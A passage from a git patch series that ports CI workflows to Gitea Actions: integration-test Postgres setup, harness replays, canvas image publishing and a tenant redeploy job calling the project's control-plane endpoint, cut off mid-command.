POSTGRES_DB=molecule \ + postgres:15-alpine >/dev/null + + # Read back the bridge IP. Always present immediately after + # `docker run -d` for bridge networks. + PG_HOST=$(docker inspect "${PG_NAME}" \ + --format "{{(index .NetworkSettings.Networks \"${PG_NETWORK}\").IPAddress}}") + if [ -z "${PG_HOST}" ]; then + echo "::error::Could not resolve PG_HOST for ${PG_NAME} on ${PG_NETWORK}" + docker logs "${PG_NAME}" || true + exit 1 + fi + echo "PG_HOST=${PG_HOST}" >> "$GITHUB_ENV" + echo "INTEGRATION_DB_URL=postgres://postgres:test@${PG_HOST}:5432/molecule?sslmode=disable" >> "$GITHUB_ENV" + echo "Started ${PG_NAME} at ${PG_HOST}:5432" + + - if: needs.detect-changes.outputs.handlers == 'true' + name: Apply migrations to Postgres service + env: + PGPASSWORD: test + run: | + # Wait for postgres to actually accept connections. Docker's + # health-cmd handles container-side readiness, but the wire + # to the bridge IP is best-tested with pg_isready directly. + for i in {1..15}; do + if pg_isready -h "${PG_HOST}" -p 5432 -U postgres -q; then break; fi + echo "waiting for postgres at ${PG_HOST}:5432..."; sleep 2 + done + + # Apply every .up.sql in lexicographic order with + # ON_ERROR_STOP=0 — failing migrations are SKIPPED rather than + # blocking the suite. This handles the current schema state + # where a few historical migrations (e.g. 017_memories_fts_*) + # depend on tables that were later renamed/dropped and so + # cannot replay from scratch. The migrations that DO succeed + # land their tables, which is sufficient for the integration + # tests in handlers/. + # + # Why not maintain a curated allowlist: every new migration + # touching a handlers/-tested table would have to update this + # workflow. With apply-all-or-skip, a future migration that + # adds a column to delegations runs automatically (its base + # table 049_delegations.up.sql already succeeded above it in + # the order). Operators only need to revisit this if the + # migration chain becomes legitimately replayable end-to-end. + # + # Per-migration result is logged so a failed migration that + # SHOULD have been replayable surfaces in the CI log instead + # of silently failing. + # Apply both *.sql (legacy, lives next to its module) and + # *.up.sql (newer up/down convention) in a single + # lexicographically-sorted pass. Excluding *.down.sql so the + # newest-naming-convention pairs don't undo themselves mid-run. + # Pre-#149-followup this loop only globbed *.up.sql, which + # silently skipped 001_workspaces.sql + 009_activity_logs.sql + # — fine while no integration test depended on those tables, + # not fine once a cross-table atomicity test came in. + set +e + for migration in $(ls migrations/*.sql 2>/dev/null | grep -v '\.down\.sql$' | sort); do + if psql -h "${PG_HOST}" -U postgres -d molecule -v ON_ERROR_STOP=1 \ + -f "$migration" >/dev/null 2>&1; then + echo "✓ $(basename "$migration")" + else + echo "⊘ $(basename "$migration") (skipped — see comment in workflow)" + fi + done + set -e + + # Sanity: the delegations + workspaces + activity_logs tables + # MUST exist for the integration tests to be meaningful. Hard- + # fail if any didn't land — that would be a real regression we + # want loud. + for tbl in delegations workspaces activity_logs pending_uploads; do + if ! psql -h "${PG_HOST}" -U postgres -d molecule -tA \ + -c "SELECT 1 FROM information_schema.tables WHERE table_name = '$tbl'" \ + | grep -q 1; then + echo "::error::$tbl table missing after migration replay — handler integration tests would be meaningless" + exit 1 + fi + echo "✓ $tbl table present" + done + + - if: needs.detect-changes.outputs.handlers == 'true' + name: Run integration tests + run: | + # INTEGRATION_DB_URL is exported by the start-postgres step; + # points at the per-run bridge IP, not 127.0.0.1, so concurrent + # workflow runs don't fight over a host-net 5432 port. + go test -tags=integration -timeout 5m -v ./internal/handlers/ -run "^TestIntegration_" + + - if: failure() && needs.detect-changes.outputs.handlers == 'true' + name: Diagnostic dump on failure + env: + PGPASSWORD: test + run: | + echo "::group::postgres container status" + docker ps -a --filter "name=${PG_NAME}" --format '{{.Status}} {{.Names}}' || true + docker logs "${PG_NAME}" 2>&1 | tail -50 || true + echo "::endgroup::" + echo "::group::delegations table state" + psql -h "${PG_HOST}" -U postgres -d molecule -c "SELECT * FROM delegations LIMIT 50;" || true + echo "::endgroup::" + + - if: always() && needs.detect-changes.outputs.handlers == 'true' + name: Stop sibling Postgres + working-directory: . + run: | + # always() so containers don't leak when migrations or tests + # fail. The cleanup is best-effort: if the container is + # already gone (e.g. concurrent rerun race), don't fail the job. + docker rm -f "${PG_NAME}" >/dev/null 2>&1 || true + echo "Cleaned up ${PG_NAME}" diff --git a/.gitea/workflows/harness-replays.yml b/.gitea/workflows/harness-replays.yml new file mode 100644 index 00000000..9186f673 --- /dev/null +++ b/.gitea/workflows/harness-replays.yml @@ -0,0 +1,262 @@ +name: Harness Replays + +# Ported from .github/workflows/harness-replays.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Boots tests/harness (production-shape compose topology with TenantGuard, +# /cp/* proxy, canvas proxy, real production Dockerfile.tenant) and runs +# every replay under tests/harness/replays/. Fails the PR if any replay +# fails. +# +# Why this exists: 2026-04-30 we shipped #2398 which added /buildinfo as +# a public route in router.go but forgot to add it to TenantGuard's +# allowlist. The handler-level test in buildinfo_test.go constructed a +# minimal gin engine without TenantGuard — green. The harness's +# buildinfo-stale-image.sh replay would have caught it (cf-proxy doesn't +# inject X-Molecule-Org-Id, so the curl path is identical to production's +# redeploy verifier), but no one ran the harness pre-merge. The bug +# shipped; the redeploy verifier silently soft-warned every tenant as +# "unreachable" for ~1 day before being noticed. +# +# This gate makes "did you actually run the harness?" a CI invariant +# instead of a memory-discipline thing. +# +# Trigger model — match e2e-api.yml: always FIRES on push/pull_request +# to staging+main, real work is gated per-step on detect-changes output. +# One job → one check run → branch-protection-clean (the SKIPPED-in-set +# trap from PR #2264 is documented in e2e-api.yml's e2e-api job comment). + +on: + push: + branches: [main, staging] + paths: + - 'workspace-server/**' + - 'canvas/**' + - 'tests/harness/**' + - '.gitea/workflows/harness-replays.yml' + pull_request: + branches: [main, staging] + paths: + - 'workspace-server/**' + - 'canvas/**' + - 'tests/harness/**' + - '.gitea/workflows/harness-replays.yml' +concurrency: + # Per-SHA grouping. Per-ref kept hitting the auto-promote-staging + # cancellation deadlock — see e2e-api.yml's concurrency block for + # the 2026-04-28 incident that codified this pattern. + group: harness-replays-${{ github.event.pull_request.head.sha || github.sha }} + cancel-in-progress: false + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + detect-changes: + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + outputs: + run: ${{ steps.decide.outputs.run }} + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + - id: decide + run: | + # workflow_dispatch: always run (manual trigger) + if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then + echo "run=true" >> "$GITHUB_OUTPUT" + echo "debug=manual-trigger" >> "$GITHUB_OUTPUT" + exit 0 + fi + + # Determine the base commit to diff against. + # For pull_request: use base.sha (the merge-base with main/staging). + # For push: use github.event.before (the previous tip of the branch). + # Fallback for new branches (all-zeros SHA): run everything. + if [ "${{ github.event_name }}" = "pull_request" ] && \ + [ -n "${{ github.event.pull_request.base.sha }}" ]; then + BASE="${{ github.event.pull_request.base.sha }}" + elif [ -n "${{ github.event.before }}" ] && \ + ! echo "${{ github.event.before }}" | grep -qE '^0+$'; then + BASE="${{ github.event.before }}" + else + # New branch or github.event.before unavailable — run everything. + echo "run=true" >> "$GITHUB_OUTPUT" + echo "debug=new-branch-fallback" >> "$GITHUB_OUTPUT" + exit 0 + fi + + # GitHub Actions and Gitea Actions both expose github.sha for HEAD. + DIFF=$(git diff --name-only "$BASE" "${{ github.sha }}" 2>/dev/null) + echo "debug=diff-base=$BASE diff-files=$DIFF" >> "$GITHUB_OUTPUT" + + if echo "$DIFF" | grep -qE '^workspace-server/|^canvas/|^tests/harness/|^.gitea/workflows/harness-replays\.yml$'; then + echo "run=true" >> "$GITHUB_OUTPUT" + else + echo "run=false" >> "$GITHUB_OUTPUT" + fi + + # ONE job that always runs. Real work is gated per-step on + # detect-changes.outputs.run so an unrelated PR (e.g. doc-only + # change to molecule-controlplane wired here later) emits the + # required check without spending CI cycles. Single-job pattern + # matches e2e-api.yml — see that workflow's comment for why a + # job-level `if: false` would block branch protection via the + # SKIPPED-in-set bug. + harness-replays: + needs: detect-changes + name: Harness Replays + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + timeout-minutes: 30 + steps: + - name: No-op pass (paths filter excluded this commit) + if: needs.detect-changes.outputs.run != 'true' + run: | + echo "No workspace-server / canvas / tests/harness / workflow changes — Harness Replays gate satisfied without running." + echo "::notice::Harness Replays no-op pass (paths filter excluded this commit)." + echo "::notice::Debug: ${{ needs.detect-changes.outputs.debug }}" + + - if: needs.detect-changes.outputs.run == 'true' + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + # Log what files were detected so future failures include the diff. + - name: Log detected changes + if: needs.detect-changes.outputs.run == 'true' + run: | + echo "::notice::detect-changes debug: ${{ needs.detect-changes.outputs.debug }}" + + # github-app-auth sibling-checkout removed 2026-05-07 (#157): + # the plugin was dropped + Dockerfile.tenant no longer COPYs it. + + # Pre-clone manifest deps before docker compose builds the tenant + # image (Task #173 followup — same pattern as + # publish-workspace-server-image.yml's "Pre-clone manifest deps" + # step). + # + # Why pre-clone here too: tests/harness/compose.yml builds tenant-alpha + # and tenant-beta from workspace-server/Dockerfile.tenant with + # context=../.. (repo root). That Dockerfile expects + # .tenant-bundle-deps/{workspace-configs-templates,org-templates,plugins} + # to be present at build context root (post-#173 it COPYs from there + # instead of running an in-image clone — the in-image clone failed + # with "could not read Username for https://git.moleculesai.app" + # because there's no auth path inside the build sandbox). + # + # Without this step harness-replays fails before any replay runs, + # with `failed to calculate checksum of ref ... + # "/.tenant-bundle-deps/plugins": not found`. Caught by run #892 + # (main, 2026-05-07T20:28:53Z) and run #964 (staging — same + # symptom, different root cause: staging still has the in-image + # clone path, hits the auth error directly). + # + # 2026-05-08 sub-finding (#192): the clone step ALSO fails when + # any referenced workspace-template repo is private and the + # AUTO_SYNC_TOKEN bearer (devops-engineer persona) lacks read + # access. Root cause: 5 of 9 workspace-template repos + # (openclaw, codex, crewai, deepagents, gemini-cli) had been + # marked private with no team grant. Resolution: flipped them + # to public per `feedback_oss_first_repo_visibility_default` + # (the OSS surface should be public). Layer-3 (customer-private + + # marketplace third-party repos) tracked separately in + # internal#102. + # + # Token shape matches publish-workspace-server-image.yml: AUTO_SYNC_TOKEN + # is the devops-engineer persona PAT, NOT the founder PAT (per + # `feedback_per_agent_gitea_identity_default`). clone-manifest.sh + # embeds it as basic-auth for the duration of the clones and strips + # .git directories — the token never enters the resulting image. + - name: Pre-clone manifest deps + if: needs.detect-changes.outputs.run == 'true' + env: + MOLECULE_GITEA_TOKEN: ${{ secrets.AUTO_SYNC_TOKEN }} + run: | + set -euo pipefail + if [ -z "${MOLECULE_GITEA_TOKEN}" ]; then + echo "::error::AUTO_SYNC_TOKEN secret is empty — register the devops-engineer persona PAT in repo Actions secrets" + exit 1 + fi + mkdir -p .tenant-bundle-deps + bash scripts/clone-manifest.sh \ + manifest.json \ + .tenant-bundle-deps/workspace-configs-templates \ + .tenant-bundle-deps/org-templates \ + .tenant-bundle-deps/plugins + # Sanity-check counts so a silent partial clone fails fast + # instead of producing a half-empty image. + ws_count=$(find .tenant-bundle-deps/workspace-configs-templates -mindepth 1 -maxdepth 1 -type d | wc -l) + org_count=$(find .tenant-bundle-deps/org-templates -mindepth 1 -maxdepth 1 -type d | wc -l) + plugins_count=$(find .tenant-bundle-deps/plugins -mindepth 1 -maxdepth 1 -type d | wc -l) + echo "Cloned: ws=$ws_count org=$org_count plugins=$plugins_count" + + - name: Install Python deps for replays + # peer-discovery-404 (and future replays) eval Python against the + # running tenant — importing workspace/a2a_client.py pulls in + # httpx. tests/harness/requirements.txt holds just the HTTP-client + # surface to keep CI install fast (~3s) vs the full + # workspace/requirements.txt (~30s). + if: needs.detect-changes.outputs.run == 'true' + run: pip install -r tests/harness/requirements.txt + + - name: Run all replays against the harness + # run-all-replays.sh: boot via up.sh → seed via seed.sh → run + # every replays/*.sh → tear down via down.sh on EXIT (trap). + # Non-zero exit on any replay failure. + # + # KEEP_UP=1: without this, the script's trap-on-EXIT tears + # down containers immediately on failure, leaving the dump + # step below with nothing to dump (verified on PR #2410's + # first run — tenant became unhealthy, trap fired, dump + # step saw empty containers). Keeping them up lets the + # failure path collect tenant/cp-stub/cf-proxy logs. The + # always-run "Force teardown" step does the actual cleanup. + if: needs.detect-changes.outputs.run == 'true' + working-directory: tests/harness + env: + KEEP_UP: "1" + run: ./run-all-replays.sh + + - name: Dump compose logs on failure + # SECRETS_ENCRYPTION_KEY: docker compose validates the entire compose + # file even for read-only `logs` calls. up.sh generates a per-run key + # and exports it to its OWN shell — this step runs in a fresh shell + # that wouldn't see it, so without a placeholder the validate step + # errors before logs print (verified against PR #2492's first run: + # "required variable SECRETS_ENCRYPTION_KEY is missing a value"). + # A placeholder is fine — we're only reading log streams, not booting. + if: failure() && needs.detect-changes.outputs.run == 'true' + working-directory: tests/harness + env: + SECRETS_ENCRYPTION_KEY: dump-logs-placeholder + run: | + echo "=== docker compose ps ===" + docker compose -f compose.yml ps || true + echo "=== tenant-alpha logs ===" + docker compose -f compose.yml logs tenant-alpha || true + echo "=== tenant-beta logs ===" + docker compose -f compose.yml logs tenant-beta || true + echo "=== cp-stub logs ===" + docker compose -f compose.yml logs cp-stub || true + echo "=== cf-proxy logs ===" + docker compose -f compose.yml logs cf-proxy || true + echo "=== postgres-alpha logs (last 100) ===" + docker compose -f compose.yml logs --tail 100 postgres-alpha || true + echo "=== postgres-beta logs (last 100) ===" + docker compose -f compose.yml logs --tail 100 postgres-beta || true + + - name: Force teardown + # We pass KEEP_UP=1 to run-all-replays.sh so the dump step + # above sees real containers — that means we own teardown + # explicitly here. Always run. + if: always() && needs.detect-changes.outputs.run == 'true' + working-directory: tests/harness + run: ./down.sh || true From 7351d7766ffcabfdc8e250c16eca328804544475 Mon Sep 17 00:00:00 2001 From: dev-lead Date: Sun, 10 May 2026 21:26:21 -0700 Subject: [PATCH 5/7] =?UTF-8?q?ci:=20port=207=20deploy/publish/janitors=20?= =?UTF-8?q?to=20.gitea/workflows/=20(RFC=20internal#219=20=C2=A71,=20Categ?= =?UTF-8?q?ory=20C-3)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Sweep companion to PR#372 (ci.yml), PR#378 (Cat A), PR#379 (Cat B), PR#383 (Cat C-1), PR#386 (Cat C-2). Final port batch. Ports 7 deploy/publish/janitor workflows from .github/workflows/ to .gitea/workflows/. Each port applies the four-surface audit pattern; every job has `continue-on-error: true` (RFC §1 contract). Files ported: - publish-canvas-image.yml — canvas Docker image build/push. IMPORTANT OPEN QUESTION (flagged in file header): this workflow pushes to ghcr.io. GHCR was retired during the 2026-05-06 Gitea migration in favor of ECR. The pushed image may not be consumable post-migration. Review needs to decide: retarget to ECR (153263036946.dkr.ecr.us-east-2.amazonaws.com/molecule-ai/canvas) or retire entirely and route canvas deploys via operator-host. - redeploy-tenants-on-main.yml — prod tenant SSM redeploy on new workspace-server image. workflow_run trigger retained (same Gitea support caveat as canary-verify.yml — flagged in header). Simplified the job `if:` condition by dropping the `workflow_dispatch` branch. - redeploy-tenants-on-staging.yml — staging mirror of above. Same workflow_run caveat + same `if:` simplification. - sweep-aws-secrets.yml — hourly AWS Secrets Manager tenant-secret janitor. Dropped workflow_dispatch.inputs (dry_run/max_delete_pct/ grace_hours); cron triggers run with the script defaults instead. if-step gates conditional on github.event_name=='workflow_dispatch' are dead-code post-port but harmless. - sweep-cf-orphans.yml — hourly CF DNS janitor. Same shape. - sweep-cf-tunnels.yml — hourly CF Tunnels janitor. Same shape. - sweep-stale-e2e-orgs.yml — every-15-min staging tenant cleanup. Same shape. Open questions for review: 1. workflow_run on redeploy-tenants-on-* — same caveat as canary-verify.yml (Cat C-2). If Gitea ignores the event, the follow-up triage PR replaces with push-with-paths-filter on .gitea/workflows/publish-workspace-server-image.yml. 2. publish-canvas-image GHCR target — decide retarget-to-ECR vs retire-entirely with reviewer. 3. workflow_dispatch.inputs replacements — the four janitor sweeps lost their operator-facing dry_run/cap-override knobs. If a manual override is needed today, edit the cron envs in the file directly. Follow-up could add a "manual override commit" pattern that the cron reads from a checked-in JSON. DO NOT MERGE without orchestrator-dispatched Five-Axis review + @hongmingwang chat-go. Cross-links: - RFC: molecule-ai/internal#219 - Companions: PR#372, PR#378, PR#379, PR#383, PR#386 Co-Authored-By: Claude Opus 4.7 (1M context) --- .gitea/workflows/publish-canvas-image.yml | 135 +++++++ .gitea/workflows/redeploy-tenants-on-main.yml | 375 ++++++++++++++++++ .../workflows/redeploy-tenants-on-staging.yml | 356 +++++++++++++++++ .gitea/workflows/sweep-aws-secrets.yml | 129 ++++++ .gitea/workflows/sweep-cf-orphans.yml | 151 +++++++ .gitea/workflows/sweep-cf-tunnels.yml | 128 ++++++ .gitea/workflows/sweep-stale-e2e-orgs.yml | 243 ++++++++++++ 7 files changed, 1517 insertions(+) create mode 100644 .gitea/workflows/publish-canvas-image.yml create mode 100644 .gitea/workflows/redeploy-tenants-on-main.yml create mode 100644 .gitea/workflows/redeploy-tenants-on-staging.yml create mode 100644 .gitea/workflows/sweep-aws-secrets.yml create mode 100644 .gitea/workflows/sweep-cf-orphans.yml create mode 100644 .gitea/workflows/sweep-cf-tunnels.yml create mode 100644 .gitea/workflows/sweep-stale-e2e-orgs.yml diff --git a/.gitea/workflows/publish-canvas-image.yml b/.gitea/workflows/publish-canvas-image.yml new file mode 100644 index 00000000..f9d61214 --- /dev/null +++ b/.gitea/workflows/publish-canvas-image.yml @@ -0,0 +1,135 @@ +name: publish-canvas-image + +# Ported from .github/workflows/publish-canvas-image.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# - **Open question for review**: this workflow pushes the canvas +# image to `ghcr.io`. GHCR was retired during the 2026-05-06 +# Gitea migration in favor of ECR (per canary-verify.yml header +# notes). The image may not be consumable post-migration. Two +# options for follow-up: (a) retarget to +# `153263036946.dkr.ecr.us-east-2.amazonaws.com/molecule-ai/canvas`, +# or (b) retire this workflow entirely and route canvas deploys +# via the operator-host build path. tier:low + continue-on-error +# means failed pushes do not block PRs. +# + +# Builds and pushes the canvas Docker image to GHCR whenever a commit lands +# on main that touches canvas code. Previously canvas changes were visible in +# CI (npm run build passed) but the live container was never updated — +# operators had to manually run `docker compose build canvas` each time. +# +# Mirror of publish-platform-image.yml, adapted for the Next.js canvas layer. +# See that workflow for inline notes on macOS Keychain isolation and QEMU. + +on: + push: + branches: [main] + paths: + # Only rebuild when canvas source changes — saves GHA minutes on + # platform-only / docs-only / MCP-only merges. + - 'canvas/**' + - '.gitea/workflows/publish-canvas-image.yml' + # Manual trigger: use after a non-canvas merge that still needs a fresh + # image (e.g. a Dockerfile change lives outside the canvas/ tree). +permissions: + contents: read + packages: write # required to push to ghcr.io/${{ github.repository_owner }}/* + +env: + IMAGE_NAME: ghcr.io/molecule-ai/canvas + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + build-and-push: + name: Build & push canvas image + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + steps: + - name: Checkout + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Log in to GHCR + uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3 + with: + registry: ghcr.io + username: ${{ github.actor }} + password: ${{ secrets.GITHUB_TOKEN }} + + - name: Set up Docker Buildx + uses: docker/setup-buildx-action@4d04d5d9486b7bd6fa91e7baf45bbb4f8b9deedd # v4.0.0 + + # Health check: verify Docker daemon is accessible before attempting any + # build steps. This fails loudly at step 1 when the runner's docker.sock + # is inaccessible rather than silently continuing to the build step + # where docker build fails deep in ECR auth with a cryptic error. + - name: Verify Docker daemon access + run: | + set -euo pipefail + echo "::group::Docker daemon health check" + docker info 2>&1 | head -5 || { + echo "::error::Docker daemon is not accessible at /var/run/docker.sock" + echo "::error::Check: (1) daemon running, (2) runner user in docker group, (3) sock perms 660+" + exit 1 + } + echo "Docker daemon OK" + echo "::endgroup::" + + - name: Compute tags + id: tags + shell: bash + run: | + echo "sha=${GITHUB_SHA::7}" >> "$GITHUB_OUTPUT" + + - name: Resolve build args + id: build_args + # Priority: workflow_dispatch input > repo secret > hardcoded default. + # NEXT_PUBLIC_* env vars are baked into the JS bundle at build time by + # Next.js — they cannot be changed at runtime without a full rebuild. + # For local docker-compose deployments the defaults (localhost:8080) + # work as-is; production deployments should set CANVAS_PLATFORM_URL + # and CANVAS_WS_URL as repository secrets. + # + # Inputs are passed via env vars (not direct ${{ }} interpolation) to + # prevent shell injection from workflow_dispatch string inputs. + shell: bash + env: + INPUT_PLATFORM_URL: ${{ github.event.inputs.platform_url }} + SECRET_PLATFORM_URL: ${{ secrets.CANVAS_PLATFORM_URL }} + INPUT_WS_URL: ${{ github.event.inputs.ws_url }} + SECRET_WS_URL: ${{ secrets.CANVAS_WS_URL }} + run: | + PLATFORM_URL="${INPUT_PLATFORM_URL:-${SECRET_PLATFORM_URL:-http://localhost:8080}}" + WS_URL="${INPUT_WS_URL:-${SECRET_WS_URL:-ws://localhost:8080/ws}}" + + echo "platform_url=${PLATFORM_URL}" >> "$GITHUB_OUTPUT" + echo "ws_url=${WS_URL}" >> "$GITHUB_OUTPUT" + + - name: Build & push canvas image to GHCR + uses: docker/build-push-action@bcafcacb16a39f128d818304e6c9c0c18556b85f # v7.1.0 + with: + context: ./canvas + file: ./canvas/Dockerfile + platforms: linux/amd64 + push: true + build-args: | + NEXT_PUBLIC_PLATFORM_URL=${{ steps.build_args.outputs.platform_url }} + NEXT_PUBLIC_WS_URL=${{ steps.build_args.outputs.ws_url }} + tags: | + ${{ env.IMAGE_NAME }}:latest + ${{ env.IMAGE_NAME }}:sha-${{ steps.tags.outputs.sha }} + cache-from: type=gha + cache-to: type=gha,mode=max + labels: | + org.opencontainers.image.source=https://github.com/${{ github.repository }} + org.opencontainers.image.revision=${{ github.sha }} + org.opencontainers.image.description=Molecule AI canvas (Next.js 15 + React Flow) diff --git a/.gitea/workflows/redeploy-tenants-on-main.yml b/.gitea/workflows/redeploy-tenants-on-main.yml new file mode 100644 index 00000000..be7cc68d --- /dev/null +++ b/.gitea/workflows/redeploy-tenants-on-main.yml @@ -0,0 +1,375 @@ +name: redeploy-tenants-on-main + +# Ported from .github/workflows/redeploy-tenants-on-main.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# - **Gitea workflow_run trigger limitation**: Gitea 1.22.6's support +# for the `workflow_run` event is partial. If this never fires on a +# real publish-workspace-server-image completion, the follow-up +# triage PR should replace the trigger with a push-with-paths-filter +# on .gitea/workflows/publish-workspace-server-image.yml. Until +# then continue-on-error+dead-workflow doesn't break anything. +# + +# Auto-refresh prod tenant EC2s after every main merge. +# +# Why this workflow exists: publish-workspace-server-image builds and +# pushes a new platform-tenant : to ECR on every merge to main, +# but running tenants pulled their image once at boot and never re-pull. +# Users see stale code indefinitely. +# +# This workflow closes the gap by calling the control-plane admin +# endpoint that performs a canary-first, batched, health-gated rolling +# redeploy across every live tenant. Implemented in molecule-ai/ +# molecule-controlplane as POST /cp/admin/tenants/redeploy-fleet +# (feat/tenant-auto-redeploy, landing alongside this workflow). +# +# Registry: ECR (153263036946.dkr.ecr.us-east-2.amazonaws.com/ +# molecule-ai/platform-tenant). GHCR was retired 2026-05-07 during the +# Gitea suspension migration. The canary-verify.yml promote step now +# uses the same redeploy-fleet endpoint (fixes the silent-GHCR gap). +# +# Runtime ordering: +# 1. publish-workspace-server-image completes → new :staging- in ECR. +# 2. This workflow fires via workflow_run, calls redeploy-fleet with +# target_tag=staging-. No CDN propagation wait needed — +# ECR image manifest is consistent immediately after push. +# 3. Calls redeploy-fleet with canary_slug (if set) and a soak +# period. Canary proves the image boots; batches follow. +# 4. Any failure aborts the rollout and leaves older tenants on the +# prior image — safer default than half-and-half state. +# +# Rollback path: re-run this workflow with a specific SHA pinned via +# the workflow_dispatch input. That calls redeploy-fleet with +# target_tag=, re-pulling the older image on every tenant. + +on: + workflow_run: + workflows: ['publish-workspace-server-image'] + types: [completed] + branches: [main] +permissions: + contents: read + # No write scopes needed — the workflow hits an external CP endpoint, + # not the GitHub API. + +# Serialize redeploys so two rapid main pushes' redeploys don't overlap +# and cause confusing per-tenant SSM state. Without this, GitHub's +# implicit workflow_run queueing would *probably* serialize them, but +# the explicit block makes the invariant defensible. Mirrors the +# concurrency block on redeploy-tenants-on-staging.yml for shape parity. +# +# cancel-in-progress: false → aborting a half-rolled-out fleet would +# leave tenants stuck on whatever image they happened to be on when +# cancelled. Better to finish the in-flight rollout before starting +# the next one. +concurrency: + group: redeploy-tenants-on-main + cancel-in-progress: false + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + redeploy: + # Skip the auto-trigger if publish-workspace-server-image didn't + # actually succeed. workflow_run fires on any completion state; we + # don't want to redeploy against a half-built image. + # NOTE (Gitea port): workflow_dispatch trigger dropped; only the + # workflow_run path remains. + if: ${{ github.event.workflow_run.conclusion == 'success' }} + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + timeout-minutes: 25 + steps: + - name: Note on ECR propagation + # ECR image manifests are consistent immediately after push — no + # CDN cache to wait for. The old GHCR-based workflow had a 30s + # sleep to avoid race conditions; ECR makes that unnecessary. + run: echo "ECR image available immediately after push — proceeding." + + - name: Compute target tag + id: tag + # Resolution order: + # 1. Operator-supplied input (workflow_dispatch with explicit + # tag) → used verbatim. Lets ops pin `latest` for emergency + # rollback to last canary-verified digest, or pin a specific + # `staging-` to roll back to a known-good build. + # 2. Default → `staging-`. The just-published + # digest. Bypasses the `:latest` retag path that's currently + # dead (canary-verify soft-skips without canary fleet, so + # the only thing retagging `:latest` today is the manual + # promote-latest.yml — last run 2026-04-28). Auto-trigger + # from workflow_run uses workflow_run.head_sha; manual + # dispatch with no input falls through to github.sha. + env: + INPUT_TAG: ${{ inputs.target_tag }} + HEAD_SHA: ${{ github.event.workflow_run.head_sha || github.sha }} + run: | + set -euo pipefail + if [ -n "${INPUT_TAG:-}" ]; then + echo "target_tag=$INPUT_TAG" >> "$GITHUB_OUTPUT" + echo "Using operator-pinned tag: $INPUT_TAG" + else + SHORT="${HEAD_SHA:0:7}" + echo "target_tag=staging-$SHORT" >> "$GITHUB_OUTPUT" + echo "Using auto tag: staging-$SHORT (head_sha=$HEAD_SHA)" + fi + + - name: Call CP redeploy-fleet + # CP_ADMIN_API_TOKEN must be set as a repo/org secret on + # molecule-ai/molecule-core, matching the staging/prod CP's + # CP_ADMIN_API_TOKEN env. Stored in Railway, mirrored to this + # repo's secrets for CI. + env: + CP_URL: ${{ vars.CP_URL || 'https://api.moleculesai.app' }} + CP_ADMIN_API_TOKEN: ${{ secrets.CP_ADMIN_API_TOKEN }} + TARGET_TAG: ${{ steps.tag.outputs.target_tag }} + CANARY_SLUG: ${{ inputs.canary_slug || 'hongming' }} + SOAK_SECONDS: ${{ inputs.soak_seconds || '60' }} + BATCH_SIZE: ${{ inputs.batch_size || '3' }} + DRY_RUN: ${{ inputs.dry_run || false }} + run: | + set -euo pipefail + + if [ -z "${CP_ADMIN_API_TOKEN:-}" ]; then + echo "::error::CP_ADMIN_API_TOKEN secret not set — skipping redeploy" + echo "::notice::Set CP_ADMIN_API_TOKEN in repo secrets to enable auto-redeploy." + exit 1 + fi + + BODY=$(jq -nc \ + --arg tag "$TARGET_TAG" \ + --arg canary "$CANARY_SLUG" \ + --argjson soak "$SOAK_SECONDS" \ + --argjson batch "$BATCH_SIZE" \ + --argjson dry "$DRY_RUN" \ + '{ + target_tag: $tag, + canary_slug: $canary, + soak_seconds: $soak, + batch_size: $batch, + dry_run: $dry + }') + + echo "POST $CP_URL/cp/admin/tenants/redeploy-fleet" + echo " body: $BODY" + + HTTP_RESPONSE=$(mktemp) + HTTP_CODE_FILE=$(mktemp) + # Route -w into its own tempfile so curl's exit code (e.g. 56 + # on connection-reset, 22 on --fail-with-body 4xx/5xx) can't + # pollute the captured stdout. The previous inline-substitution + # shape produced "000000" on connection reset (curl wrote + # "000" via -w, then the inline echo-fallback appended another + # "000") — caught on the 2026-05-04 redeploy of sha 2b862f6. + # set +e/-e keeps the non-zero curl exit from tripping the + # outer pipeline. See lint-curl-status-capture.yml for the + # CI gate that pins this fix shape. + set +e + curl -sS -o "$HTTP_RESPONSE" -w '%{http_code}' \ + -m 1200 \ + -H "Authorization: Bearer $CP_ADMIN_API_TOKEN" \ + -H 